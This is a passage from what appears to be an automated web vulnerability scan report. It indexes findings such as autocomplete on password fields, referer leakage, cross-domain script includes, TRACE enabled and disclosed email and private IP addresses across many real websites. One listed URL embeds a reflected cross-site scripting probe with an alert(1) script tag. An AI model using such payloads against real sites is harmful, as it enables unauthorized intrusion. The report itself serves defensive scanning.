15.95. http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx

15.96. http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png

15.97. http://blogs.technet.com/cfs-filesystemfile.ashx/__key/CommunityServer-Components-PostAttachments/00-03-20-04-44/MPC_2D00_BlogBanner.png

15.98. http://blogs.technet.com/photos/mmpcblog/images/3200444/original.aspx

15.99. http://blogs.technet.com/themes/TechNet/Images/MediaGalleries/icon-share.gif

15.100. http://blogs.technet.com/themes/TechNet/Images/Weblogs/icon-home.gif

15.101. http://blogs.technet.com/themes/TechNet/Images/Weblogs/icon-info.gif

15.102. http://blogs.technet.com/themes/TechNet/Images/Weblogs/icon-rss.gif

15.103. http://blogs.technet.com/themes/TechNet/css/DynamicStyle.aspx

15.104. http://blogs.technet.com/themes/TechNet/css/base.css

15.105. http://blogs.technet.com/themes/TechNet/css/content-fragments-core.css

15.106. http://blogs.technet.com/themes/TechNet/css/content-fragments-forums.css

15.107. http://blogs.technet.com/themes/TechNet/css/content-fragments-groups.css

15.108. http://blogs.technet.com/themes/TechNet/css/content-fragments-mediagalleries.css

15.109. http://blogs.technet.com/themes/TechNet/css/content-fragments-messages.css

15.110. http://blogs.technet.com/themes/TechNet/css/content-fragments-weblogs.css

15.111. http://blogs.technet.com/themes/TechNet/css/content-fragments-wikis.css

15.112. http://blogs.technet.com/themes/TechNet/css/content-fragments.css

15.113. http://blogs.technet.com/themes/TechNet/css/footer-fragments.css

15.114. http://blogs.technet.com/themes/TechNet/css/header-fragments.css

15.115. http://blogs.technet.com/themes/TechNet/css/print.css

15.116. http://blogs.technet.com/themes/TechNet/css/screen.css

15.117. http://blogs.technet.com/themes/TechNet/favicon.ico

15.118. http://blogs.technet.com/themes/blogs/TechNet/css/DynamicStyle.aspx

15.119. http://blogs.technet.com/themes/blogs/TechNet/css/technetblogs.css

15.120. http://blogs.technet.com/themes/blogs/TechNet/images/group-nav-sep.png

15.121. http://blogs.technet.com/themes/generic/css/layout.css

15.122. http://blogs.technet.com/themes/groups/TechNet/css/DynamicStyle.aspx

15.123. http://blogs.technet.com/themes/technet/css/technet.css

15.124. http://blogs.technet.com/themes/technet/images/technet/layout-background.png

15.125. http://blogs.technet.com/themes/technet/images/technet/layout-footer.png

15.126. http://blogs.technet.com/themes/technet/images/technet/microsoft.gif

15.127. http://blogs.technet.com/themes/technet/images/technet/search.png

15.128. http://blogs.technet.com/themes/technet/images/technet/technet-body.png

15.129. http://blogs.technet.com/themes/technet/images/technet/widget-left.png

15.130. http://blogs.technet.com/themes/technet/images/technet/widget-right.png

15.131. http://blogs.technet.com/utility/jquery/autoresize.jquery.min.js

15.132. http://blogs.technet.com/utility/jquery/jquery-1.3.2.min.js

15.133. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js

15.134. http://c.bing.com/c.gif

15.135. http://c.microsoft.com/trans_pixel.asp

15.136. http://d.101m3.com/afr.php

15.137. http://d.101m3.com/lg.php

15.138. http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.22.1/s0369559922255

15.139. http://explore.live.com/Handlers/Plt.mvc

15.140. https://feedback.discoverbing.com/default.aspx

15.141. http://forums.smartertools.com/

15.142. http://forums.smartertools.com/12.aspx

15.143. http://forums.smartertools.com/AddPost.aspx

15.144. http://forums.smartertools.com/cssearch/SearchResults.aspx

15.145. http://forums.smartertools.com/login.aspx

15.146. http://forums.smartertools.com/members/Chromebuster.aspx

15.147. http://forums.smartertools.com/t/33244.aspx

15.148. http://forums.smartertools.com/t/33246.aspx

15.149. http://forums.smartertools.com/themes/leanandgreen/style/DynamicStyle.aspx

15.150. http://leadback.advertising.com/adcedge/lb

15.151. http://m.webtrends.com/dcs0junic89k7m2gzez6wz0k8_7v8n/dcs.gif

15.152. http://m.webtrends.com/dcsjwb9vb00000c932fd0rjc7_5p3t/dcs.gif

15.153. http://office.microsoft.com/en-us/sharepoint-workspace/

15.154. http://order.1and1.com/xml/order

15.155. http://order.1and1.com/xml/order

15.156. http://order.1and1.com/xml/order/CloudDynamicServerbe5ae%3C/ScRiPt%20%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E0f854fb8bb3

15.157. http://order.1and1.com/xml/order/DomaininfoMove

15.158. http://order.1and1.com/xml/order/Eshops

15.159. http://order.1and1.com/xml/order/Home

15.160. http://order.1and1.com/xml/order/Home

15.161. http://order.1and1.com/xml/order/Hosting

15.162. http://order.1and1.com/xml/order/Instant

15.163. http://order.1and1.com/xml/order/LocalSubmission

15.164. http://order.1and1.com/xml/order/Mail

15.165. http://order.1and1.com/xml/order/MailInstantMail

15.166. http://order.1and1.com/xml/order/MailXchange

15.167. http://order.1and1.com/xml/order/MicrosoftExchange

15.168. http://order.1and1.com/xml/order/MsHosting

15.169. http://order.1and1.com/xml/order/Server

15.170. http://order.1and1.com/xml/order/ServerPremium

15.171. http://order.1and1.com/xml/order/VirtualServer

15.172. http://order.1and1.com/xml/order/sitedesign

15.173. http://pixel.mathtag.com/creative/img

15.174. http://pixel.quantserve.com/pixel

15.175. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

15.176. http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif

15.177. http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js

15.178. http://safebrowsing.clients.google.com/safebrowsing/downloads

15.179. http://safebrowsing.clients.google.com/safebrowsing/gethash

15.180. http://sales.liveperson.net/hc/18987408/

15.181. http://tacoda.at.atwola.com/rtx/r.js

15.182. http://tags.bluekai.com/site/3200

15.183. http://technet.microsoft.com/security/ff852094.aspx

15.184. http://tracker.marinsm.com/tp

15.185. http://www.fast-report.com/bitrix/redirect.php

15.186. http://www.fast-report.com/bitrix/redirect2.php

15.187. http://www.fast-report.com/en/buy/

15.188. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

15.189. http://www.fast-report.com/en/download/fastreport.net-download.html

15.190. http://www.fast-report.com/en/download/fastreport.net-download.html/

15.191. http://www.fast-report.com/en/products/

15.192. http://www.fast-report.com/en/products/FastReport.Net.html

15.193. http://www.fast-report.com/favicon.ico

15.194. https://www.godaddy.com/

15.195. https://www.godaddy.com/Hosting/web-hosting.aspx

15.196. https://www.godaddy.com/catalog.aspx

15.197. https://www.godaddy.com/domains/search.aspx

15.198. https://www.godaddy.com/gdshop/hosting/landing.asp

15.199. https://www.godaddy.com/hosting/website-builder.aspx

15.200. http://www.soundingsonline.com/archives/'+NSFTW+'

16. Password field with autocomplete enabled

16.1. http://forums.smartertools.com/login.aspx

16.2. http://forums.smartertools.com/login.aspx

16.3. http://www.fast-report.com/en/buy/

16.4. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

16.5. http://www.fast-report.com/en/download/fastreport.net-download.html

16.6. http://www.fast-report.com/en/download/fastreport.net-download.html/

16.7. http://www.fast-report.com/en/products/

16.8. http://www.fast-report.com/en/products/FastReport.Net.html

16.9. https://www.godaddy.com/

16.10. https://www.godaddy.com/

16.11. https://www.godaddy.com/Hosting/web-hosting.aspx

16.12. https://www.godaddy.com/catalog.aspx

16.13. https://www.godaddy.com/domains/search.aspx

16.14. https://www.godaddy.com/domains/search.aspx

16.15. https://www.godaddy.com/gdshop/hosting/landing.asp

16.16. https://www.godaddy.com/gdshop/hosting/landing.asp

16.17. https://www.godaddy.com/hosting/website-builder.aspx

16.18. http://www.my-happyfeet.com/cart.asp

16.19. https://www.territoryahead.com/account/login/loginmain.jsp

17. Source code disclosure

18. Referer-dependent response

18.1. http://c.microsoft.com/trans_pixel.asp

18.2. http://fast.fonts.com/d/ccdadc2e-26c9-48a5-9c52-9c3cc58e9930.ttf

18.3. https://feedback.discoverbing.com/default.aspx

18.4. http://fonts.citysbest.com/k/uni0vle-e.css

18.5. http://technet.microsoft.com/en-us/magazine/ff426023.aspx

18.6. http://technet.microsoft.com/en-us/magazine/gg703766.aspx

18.7. http://use.typekit.com/k/lvr1wgh-b.css

18.8. http://www.facebook.com/plugins/like.php

18.9. http://www.fast-report.com/en/buy/

18.10. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

18.11. http://www.fast-report.com/en/download/fastreport.net-download.html/

18.12. http://www.fast-report.com/en/products/

18.13. http://www.microsoft.com/library/gallery/components/ratingControl/ratings.aspx

18.14. http://www.microsoft.com/technet/security/bulletin/ms11-mar.mspx

19. Cross-domain POST

19.1. http://ezsub.net/isapi/foxisapi.dll/main.sv.run

19.2. http://my-happyfeet.com/proddetail.asp

20. Cross-domain Referer leakage

20.1. http://a.rad.msn.com/ADSAdClient31.dll

20.2. http://a.rad.msn.com/ADSAdClient31.dll

20.3. http://a.rad.msn.com/ADSAdClient31.dll

20.4. http://a12.alphagodaddy.com/

20.5. http://a12.alphagodaddy.com/

20.6. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

20.7. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

20.8. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

20.9. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12

20.10. http://ad.doubleclick.net/adi/huffpost.politics/news

20.11. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43

20.12. http://ad.doubleclick.net/adj/huffpost.politics/news

20.13. http://ad.doubleclick.net/adj/huffpost.politics/news/curtain

20.14. http://ads.tw.adsonar.com/adserving/getAds.jsp

20.15. http://advertising.microsoft.com/search-advertising

20.16. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/noperf=1

20.17. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75

20.18. http://bidder.mathtag.com/iframe/notify

20.19. http://bidder.mathtag.com/iframe/notify

20.20. http://d.101m3.com/afr.php

20.21. http://d.101m3.com/afr.php

20.22. http://d.101m3.com/afr.php

20.23. http://d.101m3.com/afr.php

20.24. http://d.101m3.com/afr.php

20.25. http://d.101m3.com/afr.php

20.26. http://d.101m3.com/afr.php

20.27. http://d.101m3.com/afr.php

20.28. http://d.101m3.com/afr.php

20.29. http://d.101m3.com/afr.php

20.30. http://d.101m3.com/afr.php

20.31. http://d.101m3.com/afr.php

20.32. http://d.101m3.com/afr.php

20.33. http://d.101m3.com/afr.php

20.34. http://ezsub.net/isapi/foxisapi.dll/main.sv.run

20.35. https://feedback.discoverbing.com/default.aspx

20.36. http://forums.smartertools.com/cssearch/SearchResults.aspx

20.37. http://forums.smartertools.com/login.aspx

20.38. http://gfc.com/bios.php

20.39. http://gfc.com/human-resource-services.php

20.40. http://googleads.g.doubleclick.net/pagead/ads

20.41. http://googleads.g.doubleclick.net/pagead/ads

20.42. http://googleads.g.doubleclick.net/pagead/ads

20.43. http://googleads.g.doubleclick.net/pagead/ads

20.44. http://googleads.g.doubleclick.net/pagead/ads

20.45. http://googleads.g.doubleclick.net/pagead/ads

20.46. http://googleads.g.doubleclick.net/pagead/ads

20.47. http://googleads.g.doubleclick.net/pagead/ads

20.48. http://googleads.g.doubleclick.net/pagead/ads

20.49. http://googleads.g.doubleclick.net/pagead/ads

20.50. http://googleads.g.doubleclick.net/pagead/ads

20.51. http://googleads.g.doubleclick.net/pagead/ads

20.52. http://googleads.g.doubleclick.net/pagead/ads

20.53. http://googleads.g.doubleclick.net/pagead/ads

20.54. http://googleads.g.doubleclick.net/pagead/ads

20.55. http://googleads.g.doubleclick.net/pagead/ads

20.56. http://googleads.g.doubleclick.net/pagead/ads

20.57. http://googleads.g.doubleclick.net/pagead/ads

20.58. http://googleads.g.doubleclick.net/pagead/ads

20.59. http://googleads.g.doubleclick.net/pagead/ads

20.60. http://googleads.g.doubleclick.net/pagead/ads

20.61. http://googleads.g.doubleclick.net/pagead/ads

20.62. http://googleads.g.doubleclick.net/pagead/ads

20.63. http://googleads.g.doubleclick.net/pagead/ads

20.64. http://googleads.g.doubleclick.net/pagead/ads

20.65. http://googleads.g.doubleclick.net/pagead/ads

20.66. http://googleads.g.doubleclick.net/pagead/ads

20.67. http://googleads.g.doubleclick.net/pagead/ads

20.68. http://googleads.g.doubleclick.net/pagead/ads

20.69. http://googleads.g.doubleclick.net/pagead/ads

20.70. http://learn.shavlik.com/shavlik/index.cfm

20.71. http://my-happyfeet.com/cart.asp

20.72. http://my-happyfeet.com/proddetail.asp

20.73. http://o.aolcdn.com/art/merge

20.74. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr

20.75. http://order.1and1.com/xml/order/Home

20.76. http://rad.msn.com/ADSAdClient31.dll

20.77. http://rad.msn.com/ADSAdClient31.dll

20.78. http://rad.msn.com/ADSAdClient31.dll

20.79. http://s.huffpost.com/assets/js.php

20.80. https://secure.avangate.com/order/cart.php

20.81. https://secure.avangate.com/order/checkout.php

20.82. https://secure.shareit.com/shareit/checkout.html

20.83. http://www.aol.com/ajax.jsp

20.84. http://www.aol.com/ajax.jsp

20.85. http://www.aol.com/ajax.jsp

20.86. http://www.aol.com/ajax.jsp

20.87. http://www.aol.com/ajax.jsp

20.88. http://www.aol.com/ajax.jsp

20.89. http://www.aol.com/ajax.jsp

20.90. http://www.aol.com/ajax.jsp

20.91. http://www.aol.com/ajax.jsp

20.92. http://www.aol.com/ajax.jsp

20.93. http://www.aol.com/ajax.jsp

20.94. http://www.aol.com/ajax.jsp

20.95. http://www.aol.com/ajax.jsp

20.96. http://www.aol.com/ajax.jsp

20.97. http://www.aol.com/ajax.jsp

20.98. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js

20.99. http://www.facebook.com/plugins/like.php

20.100. http://www.fast-report.com/en/download/fastreport.net-download.html/

20.101. https://www.godaddy.com/

20.102. https://www.godaddy.com/Hosting/web-hosting.aspx

20.103. https://www.godaddy.com/catalog.aspx

20.104. https://www.godaddy.com/domains/search.aspx

20.105. https://www.godaddy.com/gdshop/hosting/landing.asp

20.106. https://www.godaddy.com/hosting/website-builder.aspx

20.107. http://www.huffingtonpost.com/permalink-tracker.html

20.108. http://www.huffingtonpost.com/threeup.php

20.109. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php

20.110. http://www.microsoft.com/security/msrc/RssFeedGenerator.aspx

20.111. http://www.microsoft.com/security/msrc/Twitter_msrc_Feeds_New.aspx

20.112. http://www.my-happyfeet.com/cart.asp

20.113. http://www.nutter.com/careers.php

20.114. https://www.plimus.com/jsp/buynow_analytics.jsp

20.115. http://www.soundingsonline.com/archives/'+NSFTW+'

20.116. https://www.supermedia.com/spportal/spportalFlow.do

20.117. https://www.territoryahead.com/jump.jsp

21. Cross-domain script include

21.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

21.2. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12

21.3. http://ad.doubleclick.net/adi/huffpost.politics/news

21.4. http://advertising.microsoft.com/search-advertising

21.5. http://bidder.mathtag.com/iframe/notify

21.6. http://bidder.mathtag.com/iframe/notify

21.7. http://blog.smartertools.com/archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx

21.8. http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx

21.9. http://cloudscan.org/

21.10. https://feedback.discoverbing.com/default.aspx

21.11. http://googleads.g.doubleclick.net/pagead/ads

21.12. http://googleads.g.doubleclick.net/pagead/ads

21.13. http://googleads.g.doubleclick.net/pagead/ads

21.14. http://learn.shavlik.com/shavlik/mail-list-patch-management-org.aspx

21.15. http://learn.shavlik.com/shavlik/mail-list-remediator.aspx

21.16. http://learn.shavlik.com/shavlik/mail-list-shavlik-announce.aspx

21.17. http://learn.shavlik.com/shavlik/mail-list-shavlik-xml.aspx

21.18. http://office.microsoft.com/en-us/sharepoint-workspace/

21.19. https://secure.avangate.com/order/cart.php

21.20. https://secure.avangate.com/order/checkout.php

21.21. https://secure.shareit.com/shareit/checkout.html

21.22. http://technet.microsoft.com/en-us/

21.23. http://technet.microsoft.com/en-us/security/cc261624

21.24. http://technet.microsoft.com/en-us/security/cc308575

21.25. http://technet.microsoft.com/en-us/security/cc308589

21.26. http://technet.microsoft.com/en-us/security/default

21.27. http://technet.microsoft.com/en-us/security/ff852094.aspx

21.28. http://www.aim.com/products/express/

21.29. http://www.aol.com/

21.30. http://www.cloudscan.me/

21.31. http://www.cloudscan.me/2011/03/smartermail-80-stored-xss-reflected-xss.html

21.32. http://www.cramerdev.com/

21.33. http://www.cramerdev.com/get-in-touch

21.34. http://www.cramerdev.com/get-in-touch/

21.35. http://www.cramerdev.com/weblog/

21.36. http://www.facebook.com/plugins/like.php

21.37. https://www.godaddy.com/

21.38. https://www.godaddy.com/Hosting/web-hosting.aspx

21.39. https://www.godaddy.com/catalog.aspx

21.40. https://www.godaddy.com/domains/search.aspx

21.41. https://www.godaddy.com/gdshop/hosting/landing.asp

21.42. https://www.godaddy.com/hosting/website-builder.aspx

21.43. http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html

21.44. http://www.huffingtonpost.com/permalink-tracker.html

21.45. http://www.insideup.com/ppc/leadflow/hins00/leadflow/hins00/project.php

21.46. http://www.microsoft.com/global/security/microsites/msrc/PublishingImages/spacer.gif

21.47. http://www.microsoft.com/global/security/msrc/RenderingAssets/scripts/jquery-1.4.1.min.js

21.48. http://www.smartertools.com/

21.49. http://www.smartertools.com/smartermail/mail-server-download.aspx

21.50. http://www.smartertools.com/smartermail/mail-server-software.aspx

21.51. http://www.soundingsonline.com/archives/'+NSFTW+'

21.52. https://www.supermedia.com/help

21.53. https://www.supermedia.com/help/direct-mail

21.54. https://www.supermedia.com/help/domains-email

21.55. https://www.supermedia.com/help/local-search-marketing

21.56. https://www.supermedia.com/help/web-site-design

21.57. https://www.territoryahead.com/text/cm/eluminate.js

21.58. https://www.territoryahead.com/text/js/displayfunctions.js

21.59. http://www.vcahospitals.com/favicon.ico

22. TRACE method is enabled

22.1. http://ads.pubmatic.com/

22.2. http://b.aol.com/

22.3. http://dominionenterprises.112.2o7.net/

22.4. http://entry-stats.huffpost.com/

22.5. http://image3.pubmatic.com/

22.6. http://music.aol.com/

22.7. http://o.sa.aol.com/

22.8. http://pixel.1und1.de/

22.9. http://ptrack.pubmatic.com/

22.10. http://secure-us.imrworldwide.com/

22.11. http://tacoda.at.atwola.com/

22.12. http://texasgroup.net/

22.13. http://www.aamrafitness.com/

22.14. http://www.aamranetworks.com/

22.15. http://www.aamraoutsourcing.com/

22.16. http://www.aamraresources.com/

22.17. http://www.aim.com/

22.18. http://www.bluestarfibres.com/

22.19. http://www.citysbest.com/

22.20. http://www.nutter.com/

22.21. http://www.vcahospitals.com/

23. Email addresses disclosed

23.1. http://advertising.microsoft.com/search-advertising

23.2. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js

23.3. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js

23.4. http://forums.smartertools.com/t/33246.aspx

23.5. http://gfc.com/business-consulting.php

23.6. http://gfc.com/information-technology.php

23.7. http://i2.technet.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js

23.8. http://i2.technet.microsoft.com/platform/Controls/Omniture/resources/TechNet/omni_rsid_technet-bn20110314.js

23.9. http://learn.shavlik.com/shavlik/

23.10. http://learn.shavlik.com/shavlik/download.cfm

23.11. http://learn.shavlik.com/shavlik/index.cfm

23.12. http://microsoftcambridge.com/Events/tabid/57/Default.aspx

23.13. http://microsoftcambridge.com/People/tabid/56/Default.aspx

23.14. http://microsoftcambridge.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

23.15. http://microsoftcambridge.com/Resources/Shared/scripts/widgets.js

23.16. http://microsoftcambridge.com/Teams/ApplicationVirtualization/tabid/83/Default.aspx

23.17. http://microsoftcambridge.com/Teams/FuseLabs/tabid/82/Default.aspx

23.18. http://microsoftcambridge.com/Teams/ISC/tabid/341/Default.aspx

23.19. http://microsoftcambridge.com/Teams/MicrosoftNovellInteroperability/tabid/342/Default.aspx

23.20. http://microsoftcambridge.com/Teams/MicrosoftOnlineServices/tabid/175/Default.aspx

23.21. http://microsoftcambridge.com/Teams/MicrosoftResearch/tabid/81/Default.aspx

23.22. http://microsoftcambridge.com/Teams/SharePointWorkspace/tabid/455/Default.aspx

23.23. http://microsoftcambridge.com/Teams/SoftwareServicesConceptDevelopment/tabid/84/Default.aspx

23.24. http://microsoftcambridge.com/Teams/UnifiedCommunications/tabid/102/Default.aspx

23.25. http://microsoftcambridge.com/Teams/tabid/55/Default.aspx

23.26. http://microsoftcambridge.com/controls/SolpartMenu/spmenu.js

23.27. http://my-happyfeet.com/cart.asp

23.28. http://my-happyfeet.com/proddetail.asp

23.29. http://office.microsoft.com/en-us/sharepoint-workspace/

23.30. http://s.huffpost.com/assets/js.php

23.31. http://technet.microsoft.com/en-us/magazine/gg670984.aspx

23.32. http://technet.microsoft.com/en-us/security/cc261624

23.33. http://technet.microsoft.com/en-us/security/ff852094.aspx

23.34. http://texasgroup.net/contact.html

23.35. http://texasgroup.net/management.html

23.36. http://texasgroup.net/teml_pro.html

23.37. http://www.aamraresources.com/

23.38. http://www.cramerdev.com/get-in-touch

23.39. http://www.cramerdev.com/get-in-touch/

23.40. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html

23.41. https://www.godaddy.com/

23.42. https://www.godaddy.com/Hosting/web-hosting.aspx

23.43. https://www.godaddy.com/catalog.aspx

23.44. https://www.godaddy.com/domains/search.aspx

23.45. https://www.godaddy.com/gdshop/hosting/landing.asp

23.46. https://www.godaddy.com/hosting/website-builder.aspx

23.47. http://www.huffingtonpost.com/2011/03/26/geraldine-ferraro-dead-dies_n_840995.html

23.48. http://www.manitu.de/

23.49. http://www.manitu.de/dsl/

23.50. http://www.manitu.de/root-server/

23.51. http://www.manitu.de/shop/

23.52. http://www.manitu.de/webhosting/

23.53. http://www.microsoft.com/global/security/msrc/RenderingAssets/scripts/jquery.colorbox-min.js

23.54. http://www.microsoft.com/global/security/msrc/renderingassets/scripts/CommonFunctions.js

23.55. http://www.microsoft.com/security/msrc/default.aspx

23.56. http://www.microsoft.com/technet/code/omniture/omni_rsid_mscomtechnet.js

23.57. http://www.my-happyfeet.com/cart.asp

23.58. http://www.nutter.com/careers.php

23.59. https://www.plimus.com/jsp/buynow.jsp

23.60. http://www.smartertools.com/

23.61. http://www.smartertools.com/smartermail/mail-server-download.aspx

23.62. http://www.soundingsonline.com/archives/'+NSFTW+'

23.63. http://www.soundingsonline.com/s_code.js

23.64. https://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js

23.65. https://www2.hbc.com/contactus/contact-us.asp

24. Private IP addresses disclosed

24.1. http://connect.facebook.net/en_US/all.js

24.2. http://microsoftcambridge.com/Portals/0/app_v_feat.jpg

24.3. http://microsoftcambridge.com/Portals/0/events/AgileGames2011_thum.png

24.4. http://microsoftcambridge.com/Portals/0/events/CleantechNortheast_thum.png

24.5. http://microsoftcambridge.com/Portals/0/events/FUserGroup_thum.png

24.6. http://microsoftcambridge.com/Portals/0/events/HPC&GPU_thum.png

24.7. http://microsoftcambridge.com/Portals/0/events/LevelUpYourUserExperience_thum.png

24.8. http://microsoftcambridge.com/Portals/0/events/NERD-MITX_img.png

24.9. http://microsoftcambridge.com/Portals/0/events/NERD-MITX_thum.png

24.10. http://microsoftcambridge.com/Portals/0/events/NERDwomensHistory_img.png

24.11. http://microsoftcambridge.com/Portals/0/events/NERDwomensHistory_thum.png

24.12. http://microsoftcambridge.com/Portals/0/events/NESAE_thum.png

24.13. http://microsoftcambridge.com/Portals/0/events/ProductCampBoston_thum.png

24.14. http://microsoftcambridge.com/Portals/0/events/aca_thum.png

24.15. http://microsoftcambridge.com/Portals/0/events/arduino_thum.png

24.16. http://microsoftcambridge.com/Portals/0/events/barcamp_thum.png

24.17. http://microsoftcambridge.com/Portals/0/events/bazure_thum.png

24.18. http://microsoftcambridge.com/Portals/0/events/blogbrown_thum.png

24.19. http://microsoftcambridge.com/Portals/0/events/boomwriter_thum.png

24.20. http://microsoftcambridge.com/Portals/0/events/boston-area-sharepoint_thum.png

24.21. http://microsoftcambridge.com/Portals/0/events/bostonWordpressMeetup_thum.png

24.22. http://microsoftcambridge.com/Portals/0/events/bostonphp_thum.png

24.23. http://microsoftcambridge.com/Portals/0/events/bug_thum.png

24.24. http://microsoftcambridge.com/Portals/0/events/byhp_thum.png

24.25. http://microsoftcambridge.com/Portals/0/events/dotnetnuke_thum.png

24.26. http://microsoftcambridge.com/Portals/0/events/easterSealsMA_thum.png

24.27. http://microsoftcambridge.com/Portals/0/events/eventarchive.png

24.28. http://microsoftcambridge.com/Portals/0/events/events_title.png

24.29. http://microsoftcambridge.com/Portals/0/events/fluidicmems_thum.png

24.30. http://microsoftcambridge.com/Portals/0/events/kogent_thum.png

24.31. http://microsoftcambridge.com/Portals/0/events/masschallenge_thum.png

24.32. http://microsoftcambridge.com/Portals/0/events/michiganross_thum.png

24.33. http://microsoftcambridge.com/Portals/0/events/owasp_boston_application_thum.png

24.34. http://microsoftcambridge.com/Portals/0/events/pythonmeetup_thum.png

24.35. http://microsoftcambridge.com/Portals/0/events/refreshBoston_thum.png

24.36. http://microsoftcambridge.com/Portals/0/events/register_now.jpg

24.37. http://microsoftcambridge.com/Portals/0/events/rootcauseshowcase_thum.png

24.38. http://microsoftcambridge.com/Portals/0/events/scala_thum.png

24.39. http://microsoftcambridge.com/Portals/0/events/tick.png

24.40. http://microsoftcambridge.com/Portals/0/events/upcomingevents.png

24.41. http://microsoftcambridge.com/Portals/0/events/viewarch.png

24.42. http://microsoftcambridge.com/Portals/0/events/viewupc.png

24.43. http://microsoftcambridge.com/Portals/0/events/webspark_thum.png

24.44. http://microsoftcambridge.com/Portals/0/events/wid_thum.png

24.45. http://microsoftcambridge.com/Portals/0/home/EdwinGuarinSm.jpg

24.46. http://microsoftcambridge.com/Portals/0/home/chronicle-vid.jpg

24.47. http://microsoftcambridge.com/Portals/0/home/inthenews.png

24.48. http://microsoftcambridge.com/Portals/0/home/studentstab.png

24.49. http://microsoftcambridge.com/Portals/0/home/upcomingevents.png

24.50. http://microsoftcambridge.com/Portals/0/home/welcome.png

24.51. http://microsoftcambridge.com/Portals/0/people/PaulCoebergh_thumb.jpg

24.52. http://microsoftcambridge.com/Portals/0/people/SaraSpalding_thumb.jpg

24.53. http://microsoftcambridge.com/Portals/0/people/YaelKalai_thumb.jpg

24.54. http://microsoftcambridge.com/Portals/0/people/Yaelfeat.jpg

24.55. http://microsoftcambridge.com/Portals/0/people/YunGuo_thumb.jpg

24.56. http://microsoftcambridge.com/Portals/0/people/Yunfeat.jpg

24.57. http://microsoftcambridge.com/Portals/0/people/dbrent_thumb.jpg

24.58. http://microsoftcambridge.com/Portals/0/people/jhowe_thumb.jpg

24.59. http://microsoftcambridge.com/Portals/0/people/lbrunson_thumb.jpg

24.60. http://microsoftcambridge.com/Portals/0/people/people_right.png

24.61. http://microsoftcambridge.com/Portals/0/people/people_title.png

24.62. http://microsoftcambridge.com/Portals/0/people/peopleh2_tsingh.png

24.63. http://microsoftcambridge.com/Portals/0/people/tick.png

24.64. http://microsoftcambridge.com/Portals/0/people/tsingh.jpg

24.65. http://microsoftcambridge.com/Portals/0/people/tsingh_thumb.jpg

24.66. http://microsoftcambridge.com/Portals/0/rss.png

24.67. http://microsoftcambridge.com/Portals/0/share_icons.png

24.68. http://microsoftcambridge.com/Portals/0/teams/ISC-header.jpg

24.69. http://microsoftcambridge.com/Portals/0/teams/MNIOL-header.jpg

24.70. http://microsoftcambridge.com/Portals/0/teams/app_v_header.jpg

24.71. http://microsoftcambridge.com/Portals/0/teams/app_v_inline.jpg

24.72. http://microsoftcambridge.com/Portals/0/teams/app_virt.png

24.73. http://microsoftcambridge.com/Portals/0/teams/csa_conc.png

24.74. http://microsoftcambridge.com/Portals/0/teams/csa_header.jpg

24.75. http://microsoftcambridge.com/Portals/0/teams/csa_inline.jpg

24.76. http://microsoftcambridge.com/Portals/0/teams/csacd.png

24.77. http://microsoftcambridge.com/Portals/0/teams/feature_dbrent.jpg

24.78. http://microsoftcambridge.com/Portals/0/teams/feature_jhowe.jpg

24.79. http://microsoftcambridge.com/Portals/0/teams/feature_tsingh.jpg

24.80. http://microsoftcambridge.com/Portals/0/teams/fuse.png

24.81. http://microsoftcambridge.com/Portals/0/teams/fuseimg.jpg

24.82. http://microsoftcambridge.com/Portals/0/teams/iscteam.png

24.83. http://microsoftcambridge.com/Portals/0/teams/mav.png

24.84. http://microsoftcambridge.com/Portals/0/teams/mrne.png

24.85. http://microsoftcambridge.com/Portals/0/teams/msft_advert.png

24.86. http://microsoftcambridge.com/Portals/0/teams/msft_research.png

24.87. http://microsoftcambridge.com/Portals/0/teams/msftonlineserv-header.jpg

24.88. http://microsoftcambridge.com/Portals/0/teams/msfuselabs.png

24.89. http://microsoftcambridge.com/Portals/0/teams/mtechcomp.png

24.90. http://microsoftcambridge.com/Portals/0/teams/officecom.png

24.91. http://microsoftcambridge.com/Portals/0/teams/our_teams.png

24.92. http://microsoftcambridge.com/Portals/0/teams/research_header.jpg

24.93. http://microsoftcambridge.com/Portals/0/teams/research_inline.jpg

24.94. http://microsoftcambridge.com/Portals/0/teams/sharepoint.png

24.95. http://microsoftcambridge.com/Portals/0/teams/sharepoint_img.png

24.96. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png

24.97. http://microsoftcambridge.com/Portals/0/teams/sharepoint_workspace_title.png

24.98. http://microsoftcambridge.com/Portals/0/teams/sspalding_feat.jpg

24.99. http://microsoftcambridge.com/Portals/0/teams/startuplabs_inline.jpg

